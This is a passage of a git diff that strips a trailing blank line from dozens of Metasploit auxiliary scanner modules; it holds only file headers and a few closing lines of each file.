b/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb index a2791fbd5c..0f17e4a51e 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb @@ -92,5 +92,4 @@ class MetasploitModule < Msf::Auxiliary }) end end - end diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb index dcaadd0495..a61ab70a27 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb @@ -142,5 +142,4 @@ class MetasploitModule < Msf::Auxiliary ) print_good("File saved in: #{path}") end - end diff --git a/modules/auxiliary/scanner/http/splunk_web_login.rb b/modules/auxiliary/scanner/http/splunk_web_login.rb index 3be95b4808..df1b0ac512 100644 --- a/modules/auxiliary/scanner/http/splunk_web_login.rb +++ b/modules/auxiliary/scanner/http/splunk_web_login.rb @@ -198,5 +198,4 @@ class MetasploitModule < Msf::Auxiliary return :abort end end - end diff --git a/modules/auxiliary/scanner/http/ssl_version.rb b/modules/auxiliary/scanner/http/ssl_version.rb index 2438ed200b..e4f5d00a68 100644 --- a/modules/auxiliary/scanner/http/ssl_version.rb +++ b/modules/auxiliary/scanner/http/ssl_version.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Auxiliary :exploited_at => Time.now.utc ) end - end diff --git a/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb b/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb index d40ebed0cd..30ee054971 100644 --- a/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Auxiliary rescue ::Timeout::Error, ::Errno::EPIPE end end - end diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb index 0f289890d0..0a38b25b62 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb +++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb @@ -143,5 +143,4 @@ class MetasploitModule < Msf::Auxiliary fname = datastore['FILENAME'] download_file(sid, fname) end - end diff --git a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb index bcc075803e..2c0d585ec7 100644 --- a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb +++ b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb @@ -132,5 +132,4 @@ class MetasploitModule < Msf::Auxiliary bruteforce(ip) end - end diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb index cbb3e4f1c7..8398d70186 100644 --- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb +++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb @@ -120,5 +120,4 @@ class MetasploitModule < Msf::Auxiliary create_credential_login(login_data) end - end diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 99806a2067..d8c4da4b2f 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -113,7 +113,6 @@ class MetasploitModule < Msf::Auxiliary return :abort end end - end =begin diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index e00e65d3a1..37feaedb7e 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -138,5 +138,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index b631a4525f..531166efad 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -92,5 +92,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/http/webpagetest_traversal.rb b/modules/auxiliary/scanner/http/webpagetest_traversal.rb index 435b8ad255..f54f31a6d5 100644 --- a/modules/auxiliary/scanner/http/webpagetest_traversal.rb +++ b/modules/auxiliary/scanner/http/webpagetest_traversal.rb @@ -69,5 +69,4 @@ class MetasploitModule < Msf::Auxiliary p = store_loot('webpagetest.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file)) print_good("File saved as: #{p}") end - end diff --git a/modules/auxiliary/scanner/http/wordpress_content_injection.rb b/modules/auxiliary/scanner/http/wordpress_content_injection.rb index 3c7c4bdc6f..d59d9b4377 100644 --- a/modules/auxiliary/scanner/http/wordpress_content_injection.rb +++ b/modules/auxiliary/scanner/http/wordpress_content_injection.rb @@ -212,5 +212,4 @@ class MetasploitModule < Msf::Auxiliary def route_rest_api(rest_api) normalize_uri(path_from_uri(rest_api), 'wp/v2') end - end diff --git a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb index 665beb9a58..2b2cfb7921 100644 --- a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb @@ -81,5 +81,4 @@ class MetasploitModule < Msf::Auxiliary print_status("target not vulnerable to GHOST") end end - end diff --git a/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb b/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb index 454884425c..935f439b01 100644 --- a/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb +++ b/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb @@ -133,5 +133,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb index fd48dd105f..bde26bf3f4 100644 --- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb @@ -102,5 +102,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/http/zabbix_login.rb b/modules/auxiliary/scanner/http/zabbix_login.rb index fae4332e9e..fd21ea1924 100644 --- a/modules/auxiliary/scanner/http/zabbix_login.rb +++ b/modules/auxiliary/scanner/http/zabbix_login.rb @@ -170,5 +170,4 @@ class MetasploitModule < Msf::Auxiliary res = send_request_cgi({'uri'=>dashboard_uri}) !! (res && res.code == 200 && res.body.to_s =~ /Zabbix .*: Dashboard<\/title>/) end - end diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb index b1e85f4a4e..173afb9920 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb b/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb index 8ab3572b98..76b7d1ebf4 100644 --- a/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb +++ b/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb @@ -93,5 +93,4 @@ class MetasploitModule < Msf::Auxiliary udp_sock.close end end - end diff --git a/modules/auxiliary/scanner/imap/imap_version.rb b/modules/auxiliary/scanner/imap/imap_version.rb index d5fe1fc1ef..429d0ef92d 100644 --- a/modules/auxiliary/scanner/imap/imap_version.rb +++ b/modules/auxiliary/scanner/imap/imap_version.rb @@ -30,5 +30,4 @@ class MetasploitModule < Msf::Auxiliary print_error("#{ip}:#{rport} - #{e} #{e.backtrace}") end end - end diff --git a/modules/auxiliary/scanner/ip/ipidseq.rb b/modules/auxiliary/scanner/ip/ipidseq.rb index 80e53e4146..daf9d35d64 100644 --- a/modules/auxiliary/scanner/ip/ipidseq.rb +++ b/modules/auxiliary/scanner/ip/ipidseq.rb @@ -186,5 +186,4 @@ class MetasploitModule < Msf::Auxiliary return reply end - end diff --git a/modules/auxiliary/scanner/ipmi/ipmi_version.rb b/modules/auxiliary/scanner/ipmi/ipmi_version.rb index dbced31f70..4dfcc13a18 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_version.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_version.rb @@ -75,5 +75,4 @@ class MetasploitModule < Msf::Auxiliary # - Report a vulnerability if info.ipmi_user_null has been set (null username) end - end diff --git a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb index 46333a8da1..03ffe57a65 100644 --- a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb +++ b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb @@ -214,5 +214,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb index c7a2a1ec7d..ca23e85fe1 100644 --- a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb +++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb @@ -263,5 +263,4 @@ class MetasploitModule < Msf::Auxiliary report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "DVR NAME: #{dvr_name}") print_good("#{rhost}:#{rport} DVR #{dvr_name} found") end - end diff --git a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb index 4506220c94..c6f75f483b 100644 --- a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb +++ b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb @@ -233,5 +233,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb index ed04fc3bd1..738760e369 100644 --- a/modules/auxiliary/scanner/misc/java_rmi_server.rb +++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb @@ -176,5 +176,4 @@ class MetasploitModule < Msf::Auxiliary arguments end - end diff --git a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb index 594c2de34a..321e0d8b32 100644 --- a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb +++ b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb @@ -89,5 +89,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb index 35836ddf15..3c88b30b6b 100644 --- a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb +++ b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb @@ -128,5 +128,4 @@ class MetasploitModule < Msf::Auxiliary report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => info) print_good("#{rhost}:#{rport} #{info}") end - end diff --git a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb index 366c8940ca..cd12ce3f4c 100644 --- a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb +++ b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Auxiliary return pkt[0][333,12] if pkt[0][6,4] == "\x01\x06\xff\xf9" end - end diff --git a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb index 828461ef73..74b6a38c96 100644 --- a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb +++ b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Auxiliary vprint_status("#{ip}:#{rport} - Connection failed: #{e.class}: #{e}") end end - end diff --git a/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb b/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb index 1c9011a543..3e7db50100 100644 --- a/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb +++ b/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Auxiliary ) print_status("File saved in: #{path}") end - end diff --git a/modules/auxiliary/scanner/msf/msf_web_login.rb b/modules/auxiliary/scanner/msf/msf_web_login.rb index c11aae36d2..73c4453e40 100644 --- a/modules/auxiliary/scanner/msf/msf_web_login.rb +++ b/modules/auxiliary/scanner/msf/msf_web_login.rb @@ -163,5 +163,4 @@ class MetasploitModule < Msf::Auxiliary create_credential_login(login_data) end - end diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index 04099d3df1..a289c65d49 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb index 96c8b95e51..496b94a293 100644 --- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb @@ -209,5 +209,4 @@ class MetasploitModule < Msf::Auxiliary print_status("#{rhost}:#{rport} Hash Table has been saved: #{path}") end - end diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index 7e37fa8c5a..477473dffe 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -123,5 +123,4 @@ class MetasploitModule < Msf::Auxiliary return end - end diff --git a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb index 78ae3ceb09..4348facfff 100644 --- a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb @@ -124,5 +124,4 @@ class MetasploitModule < Msf::Auxiliary end return tables end - end diff --git a/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb b/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb index b20da08f77..52b67cbc51 100644 --- a/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb +++ b/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Auxiliary ) end end - end diff --git a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb index 26b1d8db45..29276f1e84 100644 --- a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb @@ -138,5 +138,4 @@ class MetasploitModule < Msf::Auxiliary bruteforce(ip) end - end diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb index 51298c68f0..a98912160d 100644 --- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb @@ -128,5 +128,4 @@ class MetasploitModule < Msf::Auxiliary create_credential_login(login_data) end - end diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb index 169ef2523d..6b0781c4d0 100644 --- a/modules/auxiliary/scanner/nfs/nfsmount.rb +++ b/modules/auxiliary/scanner/nfs/nfsmount.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Auxiliary vprint_error(e.to_s) end end - end diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index 8cf49999c3..abd77a21cf 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb @@ -269,5 +269,4 @@ class MetasploitModule < Msf::Auxiliary end report_cred(ora_info) end - end diff --git a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb index 301d3541bf..b2dfb1e2c6 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb @@ -222,5 +222,4 @@ class MetasploitModule < Msf::Auxiliary report_oracle_sid(ip,sid) if guess return guess end - end diff --git a/modules/auxiliary/scanner/oracle/oracle_login.rb b/modules/auxiliary/scanner/oracle/oracle_login.rb index 477e7fba29..68be0910b9 100644 --- a/modules/auxiliary/scanner/oracle/oracle_login.rb +++ b/modules/auxiliary/scanner/oracle/oracle_login.rb @@ -208,5 +208,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb index 8b9cd1aa26..d398bece18 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb @@ -188,5 +188,4 @@ class MetasploitModule < Msf::Auxiliary header << data return header end - end diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb index 722e6920ae..656ce151fa 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/pop3/pop3_version.rb b/modules/auxiliary/scanner/pop3/pop3_version.rb index fae6f81494..5240de754b 100644 --- a/modules/auxiliary/scanner/pop3/pop3_version.rb +++ b/modules/auxiliary/scanner/pop3/pop3_version.rb @@ -34,5 +34,4 @@ class MetasploitModule < Msf::Auxiliary print_error("#{ip}:#{rport} - #{e} #{e.backtrace}") end end - end diff --git a/modules/auxiliary/scanner/portscan/ack.rb b/modules/auxiliary/scanner/portscan/ack.rb index 78b178eefd..5c377f751c 100644 --- a/modules/auxiliary/scanner/portscan/ack.rb +++ b/modules/auxiliary/scanner/portscan/ack.rb @@ -148,5 +148,4 @@ class MetasploitModule < Msf::Auxiliary end return reply end - end diff --git a/modules/auxiliary/scanner/portscan/syn.rb b/modules/auxiliary/scanner/portscan/syn.rb index 731afdca18..a0207947f0 100644 --- a/modules/auxiliary/scanner/portscan/syn.rb +++ b/modules/auxiliary/scanner/portscan/syn.rb @@ -137,5 +137,4 @@ class MetasploitModule < Msf::Auxiliary end return reply end - end diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index e9299be215..2848005f94 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/scanner/portscan/xmas.rb b/modules/auxiliary/scanner/portscan/xmas.rb index 12f5378b24..6696a75afe 100644 --- a/modules/auxiliary/scanner/portscan/xmas.rb +++ b/modules/auxiliary/scanner/portscan/xmas.rb @@ -148,5 +148,4 @@ class MetasploitModule < Msf::Auxiliary end return reply end - end diff --git a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb index 6e5be089e7..6cf5269ebb 100644 --- a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb +++ b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Auxiliary print_status("#{rhost}:#{rport} does not appear to be vulnerable to CVE-2013-1899") end end - end diff --git a/modules/auxiliary/scanner/postgres/postgres_version.rb b/modules/auxiliary/scanner/postgres/postgres_version.rb index 06172cb2fc..0df0de3154 100644 --- a/modules/auxiliary/scanner/postgres/postgres_version.rb +++ b/modules/auxiliary/scanner/postgres/postgres_version.rb @@ -131,5 +131,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb b/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb index 72aaae74a8..355ff88ac5 100644 --- a/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb +++ b/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb @@ -208,5 +208,4 @@ class MetasploitModule < Msf::Auxiliary users << user_attributes end end - end diff --git a/modules/auxiliary/scanner/printer/printer_delete_file.rb b/modules/auxiliary/scanner/printer/printer_delete_file.rb index c80b19cad6..62ce424936 100644 --- a/modules/auxiliary/scanner/printer/printer_delete_file.rb +++ b/modules/auxiliary/scanner/printer/printer_delete_file.rb @@ -52,5 +52,4 @@ class MetasploitModule < Msf::Auxiliary pjl.end_job disconnect end - end diff --git a/modules/auxiliary/scanner/printer/printer_download_file.rb b/modules/auxiliary/scanner/printer/printer_download_file.rb index cc3895cdb6..15c5988fc6 100644 --- a/modules/auxiliary/scanner/printer/printer_download_file.rb +++ b/modules/auxiliary/scanner/printer/printer_download_file.rb @@ -61,5 +61,4 @@ class MetasploitModule < Msf::Auxiliary print_good("#{ip}:#{rport} - Saved #{path} as #{res}") end end - end diff --git a/modules/auxiliary/scanner/printer/printer_env_vars.rb b/modules/auxiliary/scanner/printer/printer_env_vars.rb index f414f166b1..e597a2f684 100644 --- a/modules/auxiliary/scanner/printer/printer_env_vars.rb +++ b/modules/auxiliary/scanner/printer/printer_env_vars.rb @@ -56,5 +56,4 @@ class MetasploitModule < Msf::Auxiliary ) end end - end diff --git a/modules/auxiliary/scanner/printer/printer_list_dir.rb b/modules/auxiliary/scanner/printer/printer_list_dir.rb index e714d7f42a..13d4ba962f 100644 --- a/modules/auxiliary/scanner/printer/printer_list_dir.rb +++ b/modules/auxiliary/scanner/printer/printer_list_dir.rb @@ -60,5 +60,4 @@ class MetasploitModule < Msf::Auxiliary ) end end - end diff --git a/modules/auxiliary/scanner/printer/printer_list_volumes.rb b/modules/auxiliary/scanner/printer/printer_list_volumes.rb index eed372019a..f654224b58 100644 --- a/modules/auxiliary/scanner/printer/printer_list_volumes.rb +++ b/modules/auxiliary/scanner/printer/printer_list_volumes.rb @@ -57,5 +57,4 @@ class MetasploitModule < Msf::Auxiliary ) end end - end diff --git a/modules/auxiliary/scanner/printer/printer_ready_message.rb b/modules/auxiliary/scanner/printer/printer_ready_message.rb index 9710e097f2..7b6d9ebc72 100644 --- a/modules/auxiliary/scanner/printer/printer_ready_message.rb +++ b/modules/auxiliary/scanner/printer/printer_ready_message.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Auxiliary ) end end - end diff --git a/modules/auxiliary/scanner/printer/printer_upload_file.rb b/modules/auxiliary/scanner/printer/printer_upload_file.rb index 0531396d1e..b55fde36cf 100644 --- a/modules/auxiliary/scanner/printer/printer_upload_file.rb +++ b/modules/auxiliary/scanner/printer/printer_upload_file.rb @@ -55,5 +55,4 @@ class MetasploitModule < Msf::Auxiliary pjl.end_job disconnect end - end diff --git a/modules/auxiliary/scanner/printer/printer_version_info.rb b/modules/auxiliary/scanner/printer/printer_version_info.rb index a2f08f5efc..7b2463c55d 100644 --- a/modules/auxiliary/scanner/printer/printer_version_info.rb +++ b/modules/auxiliary/scanner/printer/printer_version_info.rb @@ -56,5 +56,4 @@ class MetasploitModule < Msf::Auxiliary ) end end - end diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index b35ebc9f32..797f07644f 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -193,5 +193,4 @@ class MetasploitModule < Msf::Auxiliary print_status("#{ip}:#{rport} - #{status[1]}") end end - end diff --git a/modules/auxiliary/scanner/rogue/rogue_recv.rb b/modules/auxiliary/scanner/rogue/rogue_recv.rb index 4a174f4165..73ec4dfe23 100644 --- a/modules/auxiliary/scanner/rogue/rogue_recv.rb +++ b/modules/auxiliary/scanner/rogue/rogue_recv.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Auxiliary end return reply end - end diff --git a/modules/auxiliary/scanner/rservices/rexec_login.rb b/modules/auxiliary/scanner/rservices/rexec_login.rb index e867109960..d7dfb300e6 100644 --- a/modules/auxiliary/scanner/rservices/rexec_login.rb +++ b/modules/auxiliary/scanner/rservices/rexec_login.rb @@ -184,5 +184,4 @@ class MetasploitModule < Msf::Auxiliary start_session(self, "rexec #{user}:#{pass} (#{host}:#{port})", merge_me) end - end diff --git a/modules/auxiliary/scanner/rservices/rlogin_login.rb b/modules/auxiliary/scanner/rservices/rlogin_login.rb index 3a274f3a06..662a1fd989 100644 --- a/modules/auxiliary/scanner/rservices/rlogin_login.rb +++ b/modules/auxiliary/scanner/rservices/rlogin_login.rb @@ -329,5 +329,4 @@ class MetasploitModule < Msf::Auxiliary start_session(self, info, merge_me) end - end diff --git a/modules/auxiliary/scanner/rservices/rsh_login.rb b/modules/auxiliary/scanner/rservices/rsh_login.rb index 8ff120b7a9..fd758bb1cf 100644 --- a/modules/auxiliary/scanner/rservices/rsh_login.rb +++ b/modules/auxiliary/scanner/rservices/rsh_login.rb @@ -269,5 +269,4 @@ class MetasploitModule < Msf::Auxiliary start_session(self, "RSH #{user} from #{luser} (#{host}:#{port})", merge_me) end - end diff --git a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb index 446522d41f..fb8edd121e 100644 --- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb +++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb @@ -423,5 +423,4 @@ class MetasploitModule < Msf::Auxiliary print(tbl.to_s) end - end diff --git a/modules/auxiliary/scanner/sap/sap_smb_relay.rb b/modules/auxiliary/scanner/sap/sap_smb_relay.rb index a1d8643b2f..03e783811b 100644 --- a/modules/auxiliary/scanner/sap/sap_smb_relay.rb +++ b/modules/auxiliary/scanner/sap/sap_smb_relay.rb @@ -248,5 +248,4 @@ class MetasploitModule < Msf::Auxiliary run_clba_update_file_remote end end - end diff --git a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb index 2bdb5a0322..4d5dc1cc14 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Auxiliary print_status("#{shost}:#{sport} Reboot Status: " + Rex::Proto::ADDP.reply_to_string(@results[shost])) end end - end diff --git a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb index 97bf83be5e..05eb9aa8ca 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Auxiliary realport_disconnect end - end diff --git a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb index 756a9c8a2f..6a4acf7617 100644 --- a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb +++ b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb @@ -102,6 +102,5 @@ class MetasploitModule < Msf::Auxiliary print_error("#{rhost}:#{rport} - Failed to retrieve file") end - end diff --git a/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb b/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb index c1dd2c52f7..dc959c5d2d 100644 --- a/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb +++ b/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb @@ -144,5 +144,4 @@ class MetasploitModule < Msf::Auxiliary print_status("#{ip}:#{rport} - File saved in: #{path}") end - end diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index e12998b3fc..26804343f2 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -210,5 +210,4 @@ class MetasploitModule < Msf::Auxiliary return nil end end - end diff --git a/modules/auxiliary/scanner/smb/smb2.rb b/modules/auxiliary/scanner/smb/smb2.rb index a3f0162624..f083842327 100644 --- a/modules/auxiliary/scanner/smb/smb2.rb +++ b/modules/auxiliary/scanner/smb/smb2.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end end - end diff --git a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb 